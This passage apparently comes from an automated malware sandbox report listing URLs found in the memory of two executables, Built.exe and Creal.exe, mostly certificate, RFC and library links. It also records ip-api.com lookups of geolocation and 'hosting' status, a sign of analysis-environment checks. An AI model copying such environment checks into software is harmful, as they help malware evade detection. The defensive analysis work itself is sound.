              Source: Built.exe, 00000004.00000003.2123796536.000002D966898000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://csrc.nist.gov/publications/nistpubs/800-38a/sp800-38a.pdf);
              Source: Creal.exe, 00000005.00000002.2427584689.00000203E8B40000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://curl.haxx.se/rfc/cookie_spec.html
              Source: Creal.exe, 00000005.00000002.2422504490.00000203E7CA0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://docs.python.org/library/itertools.html#recipes
              Source: Creal.exe, 00000005.00000002.2423537935.00000203E7DC0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://foo/bar.tar.gz
              Source: Creal.exe, 00000005.00000002.2423537935.00000203E7DC0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://foo/bar.tgz
              Source: Creal.exe, 00000005.00000003.2180042849.00000203E790C000.00000004.00000020.00020000.00000000.sdmp, Creal.exe, 00000005.00000003.2180042849.00000203E79BD000.00000004.00000020.00020000.00000000.sdmp, Creal.exe, 00000005.00000003.2405762243.00000203E7955000.00000004.00000020.00020000.00000000.sdmp, Creal.exe, 00000005.00000003.2180042849.00000203E7A06000.00000004.00000020.00020000.00000000.sdmp, Creal.exe, 00000005.00000003.2406137702.00000203E7A06000.00000004.00000020.00020000.00000000.sdmp, Creal.exe, 00000005.00000003.2375579122.00000203E79E9000.00000004.00000020.00020000.00000000.sdmp, Creal.exe, 00000005.00000003.2372941134.00000203E79DE000.00000004.00000020.00020000.00000000.sdmp, Creal.exe, 00000005.00000003.2367740897.00000203E7970000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://google.com/
              Source: Creal.exe, 00000005.00000003.2376603648.00000203E7A06000.00000004.00000020.00020000.00000000.sdmp, Creal.exe, 00000005.00000003.2381741490.00000203E7A06000.00000004.00000020.00020000.00000000.sdmp, Creal.exe, 00000005.00000003.2365364395.00000203E7A06000.00000004.00000020.00020000.00000000.sdmp, Creal.exe, 00000005.00000003.2372527708.00000203E7A06000.00000004.00000020.00020000.00000000.sdmp, Creal.exe, 00000005.00000003.2180042849.00000203E790C000.00000004.00000020.00020000.00000000.sdmp, Creal.exe, 00000005.00000003.2405762243.00000203E7955000.00000004.00000020.00020000.00000000.sdmp, Creal.exe, 00000005.00000003.2180042849.00000203E7A06000.00000004.00000020.00020000.00000000.sdmp, Creal.exe, 00000005.00000003.2406137702.00000203E7A06000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://google.com/mail
              Source: Creal.exe, 00000005.00000003.2413104286.00000203E7AAC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://google.com/mail/
              Source: Built.exe, 00000004.00000003.2140576878.000002D967425000.00000004.00000020.00020000.00000000.sdmp, Built.exe, 00000004.00000002.2164052765.000002D966F30000.00000004.00000020.00020000.00000000.sdmp, Built.exe, 00000004.00000002.2167539470.000002D967425000.00000004.00000020.00020000.00000000.sdmp, Creal.exe, 00000005.00000003.2381479785.00000203E784F000.00000004.00000020.00020000.00000000.sdmp, Creal.exe, 00000005.00000003.2381601278.00000203E7855000.00000004.00000020.00020000.00000000.sdmp, Creal.exe, 00000005.00000003.2369311620.00000203E7810000.00000004.00000020.00020000.00000000.sdmp, Creal.exe, 00000005.00000003.2399794322.00000203E7857000.00000004.00000020.00020000.00000000.sdmp, Creal.exe, 00000005.00000003.2180042849.00000203E7811000.00000004.00000020.00020000.00000000.sdmp, Creal.exe, 00000005.00000003.2373069284.00000203E784B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://hg.python.org/cpython/file/603b4d593758/Lib/socket.py#l535
              Source: Creal.exe, 00000005.00000003.2367740897.00000203E79A9000.00000004.00000020.00020000.00000000.sdmp, Creal.exe, 00000005.00000003.2403089079.00000203E79F0000.00000004.00000020.00020000.00000000.sdmp, Creal.exe, 00000005.00000003.2372527708.00000203E79E8000.00000004.00000020.00020000.00000000.sdmp, Creal.exe, 00000005.00000003.2180042849.00000203E79BD000.00000004.00000020.00020000.00000000.sdmp, Creal.exe, 00000005.00000003.2375579122.00000203E79E9000.00000004.00000020.00020000.00000000.sdmp, Creal.exe, 00000005.00000003.2372941134.00000203E79DE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://httpbin.org/
              Source: Built.exe, 00000004.00000002.2163800806.000002D966E30000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://ip-api.com/json/?fields=225545
              Source: Built.exe, 00000004.00000003.2126560706.000002D966CE3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ip-api.com/json/?fields=225545r
              Source: Built.exe, 00000004.00000002.2163800806.000002D966E30000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://ip-api.com/line/?fields=hosting
              Source: Built.exe, 00000004.00000003.2126560706.000002D966CE3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ip-api.com/line/?fields=hostingr
              Source: Creal.exe, 00000005.00000003.2377722260.00000203E7B39000.00000004.00000020.00020000.00000000.sdmp, Creal.exe, 00000005.00000003.2407470259.00000203E7B44000.00000004.00000020.00020000.00000000.sdmp, Creal.exe, 00000005.00000003.2373408012.00000203E7B2B000.00000004.00000020.00020000.00000000.sdmp, Creal.exe, 00000005.00000003.2374098693.00000203E7B32000.00000004.00000020.00020000.00000000.sdmp, Creal.exe, 00000005.00000003.2360921736.00000203E7B21000.00000004.00000020.00020000.00000000.sdmp, Creal.exe, 00000005.00000003.2372998084.00000203E7B21000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.accv.es
              Source: Creal.exe, 00000005.00000003.2377722260.00000203E7B39000.00000004.00000020.00020000.00000000.sdmp, Creal.exe, 00000005.00000003.2407470259.00000203E7B44000.00000004.00000020.00020000.00000000.sdmp, Creal.exe, 00000005.00000003.2373408012.00000203E7B2B000.00000004.00000020.00020000.00000000.sdmp, Creal.exe, 00000005.00000003.2374098693.00000203E7B32000.00000004.00000020.00020000.00000000.sdmp, Creal.exe, 00000005.00000003.2360921736.00000203E7B21000.00000004.00000020.00020000.00000000.sdmp, Creal.exe, 00000005.00000003.2372998084.00000203E7B21000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.accv.es0
              Source: Built.exe, 00000003.00000003.2108830553.00000124EBC30000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0
              Source: Creal.exe, 00000002.00000003.2116638050.0000016B5EEBA000.00000004.00000020.00020000.00000000.sdmp, Creal.exe, 00000002.00000003.2114531562.0000016B5EEBA000.00000004.00000020.00020000.00000000.sdmp, Creal.exe, 00000002.00000003.2114770522.0000016B5EEBA000.00000004.00000020.00020000.00000000.sdmp, Creal.exe, 00000002.00000003.2117697152.0000016B5EEB4000.00000004.00000020.00020000.00000000.sdmp, Creal.exe, 00000002.00000003.2125640719.0000016B5EEB4000.00000004.00000020.00020000.00000000.sdmp, Creal.exe, 00000002.00000003.2116454412.0000016B5EEBA000.00000004.00000020.00020000.00000000.sdmp, Creal.exe, 00000002.00000003.2117697152.0000016B5EEC1000.00000004.00000020.00020000.00000000.sdmp, Creal.exe, 00000002.00000003.2125125943.0000016B5EEC1000.00000004.00000020.00020000.00000000.sdmp, Creal.exe, 00000002.00000003.2115508487.0000016B5EEBA000.00000004.00000020.00020000.00000000.sdmp, Creal.exe, 00000002.00000003.2115537759.0000016B5EEB4000.00000004.00000020.00020000.00000000.sdmp, Creal.exe, 00000002.00000003.2116002647.0000016B5EEC1000.00000004.00000020.00020000.00000000.sdmp, Creal.exe, 00000002.00000003.2115287831.0000016B5EEC1000.00000004.00000020.00020000.00000000.sdmp, Creal.exe, 00000002.00000003.2115748966.0000016B5EEBA000.00000004.00000020.00020000.00000000.sdmp, Creal.exe, 00000002.00000003.2115977535.0000016B5EEBA000.00000004.00000020.00020000.00000000.sdmp, Creal.exe, 00000002.00000003.2116002647.0000016B5EEB4000.00000004.00000020.00020000.00000000.sdmp, Creal.exe, 00000002.00000003.2114798447.0000016B5EEC1000.00000004.00000020.00020000.00000000.sdmp, Creal.exe, 00000002.00000003.2117531945.0000016B5EEB4000.00000004.00000020.00020000.00000000.sdmp, Creal.exe, 00000002.00000003.2116245484.0000016B5EEBA000.00000004.00000020.00020000.00000000.sdmp, Creal.exe, 00000002.00000003.2114552537.0000016B5EEB4000.00000004.00000020.00020000.00000000.sdmp, Creal.exe, 00000002.00000003.2126323883.0000016B5EEC1000.00000004.00000020.00020000.00000000.sdmp, Creal.exe, 00000002.00000003.2126323883.0000016B5EEB4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0
              Source: Creal.exe, 00000002.00000003.2116656541.0000016B5EEB4000.00000004.00000020.00020000.00000000.sdmp, Creal.exe, 00000002.00000003.2116638050.0000016B5EEBA000.00000004.00000020.00020000.00000000.sdmp, Creal.exe, 00000002.00000003.2114552537.0000016B5EEC1000.00000004.00000020.00020000.00000000.sdmp, Creal.exe, 00000002.00000003.2116495637.0000016B5EEB4000.00000004.00000020.00020000.00000000.sdmp, Creal.exe, 00000002.00000003.2114531562.0000016B5EEBA000.00000004.00000020.00020000.00000000.sdmp, Creal.exe, 00000002.00000003.2114770522.0000016B5EEBA000.00000004.00000020.00020000.00000000.sdmp, Creal.exe, 00000002.00000003.2117697152.0000016B5EEB4000.00000004.00000020.00020000.00000000.sdmp, Creal.exe, 00000002.00000003.2127851067.0000016B5EEC1000.00000004.00000020.00020000.00000000.sdmp, Creal.exe, 00000002.00000003.2125640719.0000016B5EEB4000.00000004.00000020.00020000.00000000.sdmp, Creal.exe, 00000002.00000003.2116454412.0000016B5EEBA000.00000004.00000020.00020000.00000000.sdmp, Creal.exe, 00000002.00000003.2125125943.0000016B5EEC1000.00000004.00000020.00020000.00000000.sdmp, Creal.exe, 00000002.00000003.2115508487.0000016B5EEBA000.00000004.00000020.00020000.00000000.sdmp, Creal.exe, 00000002.00000003.2115537759.0000016B5EEB4000.00000004.00000020.00020000.00000000.sdmp, Creal.exe, 00000002.00000003.2114798447.0000016B5EEB4000.00000004.00000020.00020000.00000000.sdmp, Creal.exe, 00000002.00000003.2116780837.0000016B5EEC1000.00000004.00000020.00020000.00000000.sdmp, Creal.exe, 00000002.00000003.2442922105.0000016B5EEC1000.00000004.00000020.00020000.00000000.sdmp, Creal.exe, 00000002.00000003.2116267220.0000016B5EEB4000.00000004.00000020.00020000.00000000.sdmp, Creal.exe, 00000002.00000003.2115748966.0000016B5EEBA000.00000004.00000020.00020000.00000000.sdmp, Creal.exe, 00000002.00000003.2116267220.0000016B5EEC1000.00000004.00000020.00020000.00000000.sdmp, Creal.exe, 00000002.00000003.2115977535.0000016B5EEBA000.00000004.00000020.00020000.00000000.sdmp, Creal.exe, 00000002.00000003.2117355623.0000016B5EEC1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0A
              Source: Creal.exe, 00000002.00000003.2116656541.0000016B5EEB4000.00000004.00000020.00020000.00000000.sdmp, Creal.exe, 00000002.00000003.2116638050.0000016B5EEBA000.00000004.00000020.00020000.00000000.sdmp, Creal.exe, 00000002.00000003.2114552537.0000016B5EEC1000.00000004.00000020.00020000.00000000.sdmp, Creal.exe, 00000002.00000003.2116495637.0000016B5EEB4000.00000004.00000020.00020000.00000000.sdmp, Creal.exe, 00000002.00000003.2114531562.0000016B5EEBA000.00000004.00000020.00020000.00000000.sdmp, Creal.exe, 00000002.00000003.2114770522.0000016B5EEBA000.00000004.00000020.00020000.00000000.sdmp, Creal.exe, 00000002.00000003.2117697152.0000016B5EEB4000.00000004.00000020.00020000.00000000.sdmp, Creal.exe, 00000002.00000003.2127851067.0000016B5EEC1000.00000004.00000020.00020000.00000000.sdmp, Creal.exe, 00000002.00000003.2125640719.0000016B5EEB4000.00000004.00000020.00020000.00000000.sdmp, Creal.exe, 00000002.00000003.2116454412.0000016B5EEBA000.00000004.00000020.00020000.00000000.sdmp, Creal.exe, 00000002.00000003.2125125943.0000016B5EEC1000.00000004.00000020.00020000.00000000.sdmp, Creal.exe, 00000002.00000003.2115508487.0000016B5EEBA000.00000004.00000020.00020000.00000000.sdmp, Creal.exe, 00000002.00000003.2115537759.0000016B5EEB4000.00000004.00000020.00020000.00000000.sdmp, Creal.exe, 00000002.00000003.2116002647.0000016B5EEC1000.00000004.00000020.00020000.00000000.sdmp, Creal.exe, 00000002.00000003.2114798447.0000016B5EEB4000.00000004.00000020.00020000.00000000.sdmp, Creal.exe, 00000002.00000003.2116780837.0000016B5EEC1000.00000004.00000020.00020000.00000000.sdmp, Creal.exe, 00000002.00000003.2442922105.0000016B5EEC1000.00000004.00000020.00020000.00000000.sdmp, Creal.exe, 00000002.00000003.2116267220.0000016B5EEB4000.00000004.00000020.00020000.00000000.sdmp, Creal.exe, 00000002.00000003.2115748966.0000016B5EEBA000.00000004.00000020.00020000.00000000.sdmp, Creal.exe, 00000002.00000003.2116267220.0000016B5EEC1000.00000004.00000020.00020000.00000000.sdmp, Creal.exe, 00000002.00000003.2115977535.0000016B5EEBA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0C
              Source: Creal.exe, 00000002.00000003.2116656541.0000016B5EEB4000.00000004.00000020.00020000.00000000.sdmp, Creal.exe, 00000002.00000003.2116638050.0000016B5EEBA000.00000004.00000020.00020000.00000000.sdmp, Creal.exe, 00000002.00000003.2116495637.0000016B5EEB4000.00000004.00000020.00020000.00000000.sdmp, Creal.exe, 00000002.00000003.2117697152.0000016B5EEB4000.00000004.00000020.00020000.00000000.sdmp, Creal.exe, 00000002.00000003.2125640719.0000016B5EEB4000.00000004.00000020.00020000.00000000.sdmp, Creal.exe, 00000002.00000003.2115508487.0000016B5EEBA000.00000004.00000020.00020000.00000000.sdmp, Creal.exe, 00000002.00000003.2114798447.0000016B5EEB4000.00000004.00000020.00020000.00000000.sdmp, Creal.exe, 00000002.00000003.2115287831.0000016B5EEC1000.00000004.00000020.00020000.00000000.sdmp, Creal.exe, 00000002.00000003.2116267220.0000016B5EEB4000.00000004.00000020.00020000.00000000.sdmp, Creal.exe, 00000002.00000003.2115977535.0000016B5EEBA000.00000004.00000020.00020000.00000000.sdmp, Creal.exe, 00000002.00000003.2125125943.0000016B5EEB4000.00000004.00000020.00020000.00000000.sdmp, Creal.exe, 00000002.00000003.2116002647.0000016B5EEB4000.00000004.00000020.00020000.00000000.sdmp, Creal.exe, 00000002.00000003.2123793224.0000016B5EEB4000.00000004.00000020.00020000.00000000.sdmp, Creal.exe, 00000002.00000003.2117531945.0000016B5EEB4000.00000004.00000020.00020000.00000000.sdmp, Creal.exe, 00000002.00000003.2115776871.0000016B5EEB4000.00000004.00000020.00020000.00000000.sdmp, Creal.exe, 00000002.00000003.2114552537.0000016B5EEB4000.00000004.00000020.00020000.00000000.sdmp, Creal.exe, 00000002.00000003.2126323883.0000016B5EEB4000.00000004.00000020.00020000.00000000.sdmp, Creal.exe, 00000002.00000003.2117355623.0000016B5EEB4000.00000004.00000020.00020000.00000000.sdmp, Creal.exe, 00000002.00000003.2116780837.0000016B5EEB4000.00000004.00000020.00020000.00000000.sdmp, Creal.exe, 00000002.00000003.2125441432.0000016B5EEB4000.00000004.00000020.00020000.00000000.sdmp, Creal.exe, 00000002.00000003.2124946806.0000016B5EEB4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0X
              Source: Built.exe, 00000003.00000003.2108830553.00000124EBC30000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.sectigo.com0
              Source: Built.exe, 00000003.00000003.2108830553.00000124EBC30000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.thawte.com0
              Source: Creal.exe, 00000005.00000002.2422504490.00000203E7CA0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://opensource.apple.com/source/CF/CF-744.18/CFBinaryPList.c
              Source: Creal.exe, 00000005.00000003.2414506269.00000203E77EE000.00000004.00000020.00020000.00000000.sdmp, Creal.exe, 00000005.00000003.2374358999.00000203E77E8000.00000004.00000020.00020000.00000000.sdmp, Creal.exe, 00000005.00000003.2374144942.00000203E77BD000.00000004.00000020.00020000.00000000.sdmp, Creal.exe, 00000005.00000003.2381479785.00000203E784F000.00000004.00000020.00020000.00000000.sdmp, Creal.exe, 00000005.00000003.2381601278.00000203E7855000.00000004.00000020.00020000.00000000.sdmp, Creal.exe, 00000005.00000003.2369311620.00000203E7810000.00000004.00000020.00020000.00000000.sdmp, Creal.exe, 00000005.00000002.2418580298.00000203E77EE000.00000004.00000020.00020000.00000000.sdmp, Creal.exe, 00000005.00000003.2399794322.00000203E7857000.00000004.00000020.00020000.00000000.sdmp, Creal.exe, 00000005.00000003.2373069284.00000203E784B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://repository.swisssign.com/
              Source: Creal.exe, 00000005.00000003.2414506269.00000203E77EE000.00000004.00000020.00020000.00000000.sdmp, Creal.exe, 00000005.00000003.2374358999.00000203E77E8000.00000004.00000020.00020000.00000000.sdmp, Creal.exe, 00000005.00000003.2374144942.00000203E77BD000.00000004.00000020.00020000.00000000.sdmp, Creal.exe, 00000005.00000002.2418580298.00000203E77EE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://repository.swisssign.com/0
              Source: Creal.exe, 00000005.00000003.2402674199.00000203E77B0000.00000004.00000020.00020000.00000000.sdmp, Creal.exe, 00000005.00000003.2375493064.00000203E77B0000.00000004.00000020.00020000.00000000.sdmp, Creal.exe, 00000005.00000002.2418580298.00000203E77B0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://repository.swisssign.com/C
              Source: Built.exe, 00000003.00000003.2108830553.00000124EBC30000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://s.symcb.com/universal-root.crl0
              Source: Built.exe, 00000003.00000003.2108830553.00000124EBC30000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://s.symcd.com06
              Source: Creal.exe, 00000005.00000003.2410251337.00000203E7AA4000.00000004.00000020.00020000.00000000.sdmp, Creal.exe, 00000005.00000003.2413104286.00000203E7AAC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://tools.ietf.org/html/rfc4880
              Source: Creal.exe, 00000005.00000002.2428133782.00000203E8DBC000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://tools.ietf.org/html/rfc5297
              Source: Creal.exe, 00000005.00000002.2426443481.00000203E8460000.00000004.00000020.00020000.00000000.sdmp, Creal.exe, 00000005.00000003.2376137526.00000203E8430000.00000004.00000020.00020000.00000000.sdmp, Creal.exe, 00000005.00000003.2380581302.00000203E8451000.00000004.00000020.00020000.00000000.sdmp, Creal.exe, 00000005.00000003.2376742548.00000203E843A000.00000004.00000020.00020000.00000000.sdmp, Creal.exe, 00000005.00000003.2374144942.00000203E77BD000.00000004.00000020.00020000.00000000.sdmp, Creal.exe, 00000005.00000003.2376177154.00000203E8437000.00000004.00000020.00020000.00000000.sdmp, Creal.exe, 00000005.00000003.2408002776.00000203E77D0000.00000004.00000020.00020000.00000000.sdmp, Creal.exe, 00000005.00000003.2379853971.00000203E77CF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://tools.ietf.org/html/rfc5869
              Source: Built.exe, 00000004.00000002.2171255511.000002D967DE4000.00000004.00001000.00020000.00000000.sdmp, Creal.exe, 00000005.00000002.2425292105.00000203E8110000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://tools.ietf.org/html/rfc6125#section-6.4.3
              Source: Built.exe, 00000003.00000003.2108830553.00000124EBC30000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ts-aia.ws.symantec.com/sha256-tss-ca.cer0(
              Source: Built.exe, 00000003.00000003.2108830553.00000124EBC30000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ts-aia.ws.symantec.com/tss-ca-g2.cer0
              Source: Built.exe, 00000003.00000003.2108830553.00000124EBC30000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ts-crl.ws.symantec.com/sha256-tss-ca.crl0
              Source: Built.exe, 00000003.00000003.2108830553.00000124EBC30000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ts-crl.ws.symantec.com/tss-ca-g2.crl0(
              Source: Built.exe, 00000003.00000003.2108830553.00000124EBC30000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ts-ocsp.ws.symantec.com07
              Source: Built.exe, 00000003.00000003.2108830553.00000124EBC30000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ts-ocsp.ws.symantec.com0;
              Source: Creal.exe, 00000005.00000003.2403845274.00000203E7B81000.00000004.00000020.00020000.00000000.sdmp, Creal.exe, 00000005.00000003.2405592368.00000203E7B93000.00000004.00000020.00020000.00000000.sdmp, Creal.exe, 00000005.00000003.2376890554.00000203E7B7E000.00000004.00000020.00020000.00000000.sdmp, Creal.exe, 00000005.00000003.2373408012.00000203E7B2B000.00000004.00000020.00020000.00000000.sdmp, Creal.exe, 00000005.00000003.2374098693.00000203E7B32000.00000004.00000020.00020000.00000000.sdmp, Creal.exe, 00000005.00000003.2375135249.00000203E7B6F000.00000004.00000020.00020000.00000000.sdmp, Creal.exe, 00000005.00000003.2360921736.00000203E7B21000.00000004.00000020.00020000.00000000.sdmp, Creal.exe, 00000005.00000003.2372998084.00000203E7B21000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://web.cs.ucdavis.edu/~rogaway/ocb/license.htm
              Source: Creal.exe, 00000005.00000003.2377722260.00000203E7B39000.00000004.00000020.00020000.00000000.sdmp, Creal.exe, 00000005.00000003.2407470259.00000203E7B44000.00000004.00000020.00020000.00000000.sdmp, Creal.exe, 00000005.00000003.2373408012.00000203E7B2B000.00000004.00000020.00020000.00000000.sdmp, Creal.exe, 00000005.00000003.2374098693.00000203E7B32000.00000004.00000020.00020000.00000000.sdmp, Creal.exe, 00000005.00000003.2360921736.00000203E7B21000.00000004.00000020.00020000.00000000.sdmp, Creal.exe, 00000005.00000003.2372998084.00000203E7B21000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.accv.es/fileadmin/Archivos/certificados/raizaccv1.crt0
              Source: Creal.exe, 00000005.00000003.2374144942.00000203E77BD000.00000004.00000020.00020000.00000000.sdmp, Creal.exe, 00000005.00000003.2414377242.00000203E77D8000.00000004.00000020.00020000.00000000.sdmp, Creal.exe, 00000005.00000003.2414506269.00000203E77DD000.00000004.00000020.00020000.00000000.sdmp, Creal.exe, 00000005.00000003.2408002776.00000203E77D0000.00000004.00000020.00020000.00000000.sdmp, Creal.exe, 00000005.00000003.2379853971.00000203E77CF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.accv.es/fileadmin/Archivos/certificados/raizaccv1_der.crl
              Source: Creal.exe, 00000005.00000003.2377722260.00000203E7B39000.00000004.00000020.00020000.00000000.sdmp, Creal.exe, 00000005.00000003.2407470259.00000203E7B44000.00000004.00000020.00020000.00000000.sdmp, Creal.exe, 00000005.00000003.2373408012.00000203E7B2B000.00000004.00000020.00020000.00000000.sdmp, Creal.exe, 00000005.00000003.2374098693.00000203E7B32000.00000004.00000020.00020000.00000000.sdmp, Creal.exe, 00000005.00000003.2360921736.00000203E7B21000.00000004.00000020.00020000.00000000.sdmp, Creal.exe, 00000005.00000003.2372998084.00000203E7B21000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.accv.es/fileadmin/Archivos/certificados/raizaccv1_der.crl0
              Source: Creal.exe, 00000005.00000003.2373408012.00000203E7B2B000.00000004.00000020.00020000.00000000.sdmp, Creal.exe, 00000005.00000003.2374098693.00000203E7B32000.00000004.00000020.00020000.00000000.sdmp, Creal.exe, 00000005.00000003.2360921736.00000203E7B21000.00000004.00000020.00020000.00000000.sdmp, Creal.exe, 00000005.00000003.2372998084.00000203E7B21000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.accv.es/legislacion_c.htm
              Source: Creal.exe, 00000005.00000003.2377722260.00000203E7B39000.00000004.00000020.00020000.00000000.sdmp, Creal.exe, 00000005.00000003.2407470259.00000203E7B44000.00000004.00000020.00020000.00000000.sdmp, Creal.exe, 00000005.00000003.2373408012.00000203E7B2B000.00000004.00000020.00020000.00000000.sdmp, Creal.exe, 00000005.00000003.2374098693.00000203E7B32000.00000004.00000020.00020000.00000000.sdmp, Creal.exe, 00000005.00000003.2360921736.00000203E7B21000.00000004.00000020.00020000.00000000.sdmp, Creal.exe, 00000005.00000003.2372998084.00000203E7B21000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.accv.es/legislacion_c.htm0U
              Source: Creal.exe, 00000005.00000003.2377722260.00000203E7B39000.00000004.00000020.00020000.00000000.sdmp, Creal.exe, 00000005.00000003.2407470259.00000203E7B44000.00000004.00000020.00020000.00000000.sdmp, Creal.exe, 00000005.00000003.2373408012.00000203E7B2B000.00000004.00000020.00020000.00000000.sdmp, Creal.exe, 00000005.00000003.2374098693.00000203E7B32000.00000004.00000020.00020000.00000000.sdmp, Creal.exe, 00000005.00000003.2360921736.00000203E7B21000.00000004.00000020.00020000.00000000.sdmp, Creal.exe, 00000005.00000003.2372998084.00000203E7B21000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.accv.es00
              Source: Creal.exe, 00000002.00000003.2127956046.0000016B5EEB4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/
              Source: Creal.exe, 00000002.00000003.2127956046.0000016B5EEB4000.00000004.00000020.00020000.00000000.sdmp, Creal.exe, 00000002.00000003.2128029467.0000016B5EEC2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
              Source: Creal.exe, 00000005.00000003.2377575981.00000203E7B5B000.00000004.00000020.00020000.00000000.sdmp, Creal.exe, 00000005.00000003.2389785541.00000203E78D0000.00000004.00000020.00020000.00000000.sdmp, Creal.exe, 00000005.00000003.2373408012.00000203E7B2B000.00000004.00000020.00020000.00000000.sdmp, Creal.exe, 00000005.00000003.2374098693.00000203E7B32000.00000004.00000020.00020000.00000000.sdmp, Creal.exe, 00000005.00000003.2360921736.00000203E7B21000.00000004.00000020.00020000.00000000.sdmp, Creal.exe, 00000005.00000003.2373660739.00000203E78CF000.00000004.00000020.00020000.00000000.sdmp, Creal.exe, 00000005.00000003.2375300692.00000203E7B58000.00000004.00000020.00020000.00000000.sdmp, Creal.exe, 00000005.00000003.2372998084.00000203E7B21000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.cert.fnmt.es/dpcs/
              Source: Creal.exe, 00000005.00000003.2389785541.00000203E78D0000.00000004.00000020.00020000.00000000.sdmp, Creal.exe, 00000005.00000003.2373660739.00000203E78CF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.cert.fnmt.es/dpcs/f
              Source: Creal.exe, 00000005.00000003.2403845274.00000203E7B81000.00000004.00000020.00020000.00000000.sdmp, Creal.exe, 00000005.00000003.2376890554.00000203E7B7E000.00000004.00000020.00020000.00000000.sdmp, Creal.exe, 00000005.00000003.2373408012.00000203E7B2B000.00000004.00000020.00020000.00000000.sdmp, Creal.exe, 00000005.00000003.2374098693.00000203E7B32000.00000004.00000020.00020000.00000000.sdmp, Creal.exe, 00000005.00000003.2375135249.00000203E7B6F000.00000004.00000020.00020000.00000000.sdmp, Creal.exe, 00000005.00000003.2360921736.00000203E7B21000.00000004.00000020.00020000.00000000.sdmp, Creal.exe, 00000005.00000002.2421077059.00000203E7B92000.00000004.00000020.00020000.00000000.sdmp, Creal.exe, 00000005.00000003.2372998084.00000203E7B21000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.cs.ucdavis.edu/~rogaway/papers/keywrap.pdf
              Source: Creal.exe, 00000002.00000003.2116638050.0000016B5EEBA000.00000004.00000020.00020000.00000000.sdmp, Creal.exe, 00000002.00000003.2114531562.0000016B5EEBA000.00000004.00000020.00020000.00000000.sdmp, Creal.exe, 00000002.00000003.2114770522.0000016B5EEBA000.00000004.00000020.00020000.00000000.sdmp, Creal.exe, 00000002.00000003.2117697152.0000016B5EEB4000.00000004.00000020.00020000.00000000.sdmp, Creal.exe, 00000002.00000003.2125640719.0000016B5EEB4000.00000004.00000020.00020000.00000000.sdmp, Creal.exe, 00000002.00000003.2116454412.0000016B5EEBA000.00000004.00000020.00020000.00000000.sdmp, Creal.exe, 00000002.00000003.2117697152.0000016B5EEC1000.00000004.00000020.00020000.00000000.sdmp, Creal.exe, 00000002.00000003.2125125943.0000016B5EEC1000.00000004.00000020.00020000.00000000.sdmp, Creal.exe, 00000002.00000003.2115508487.0000016B5EEBA000.00000004.00000020.00020000.00000000.sdmp, Creal.exe, 00000002.00000003.2115537759.0000016B5EEB4000.00000004.00000020.00020000.00000000.sdmp, Creal.exe, 00000002.00000003.2116002647.0000016B5EEC1000.00000004.00000020.00020000.00000000.sdmp, Creal.exe, 00000002.00000003.2115287831.0000016B5EEC1000.00000004.00000020.00020000.00000000.sdmp, Creal.exe, 00000002.00000003.2115748966.0000016B5EEBA000.00000004.00000020.00020000.00000000.sdmp, Creal.exe, 00000002.00000003.2115977535.0000016B5EEBA000.00000004.00000020.00020000.00000000.sdmp, Creal.exe, 00000002.00000003.2116002647.0000016B5EEB4000.00000004.00000020.00020000.00000000.sdmp, Creal.exe, 00000002.00000003.2114798447.0000016B5EEC1000.00000004.00000020.00020000.00000000.sdmp, Creal.exe, 00000002.00000003.2117531945.0000016B5EEB4000.00000004.00000020.00020000.00000000.sdmp, Creal.exe, 00000002.00000003.2116245484.0000016B5EEBA000.00000004.00000020.00020000.00000000.sdmp, 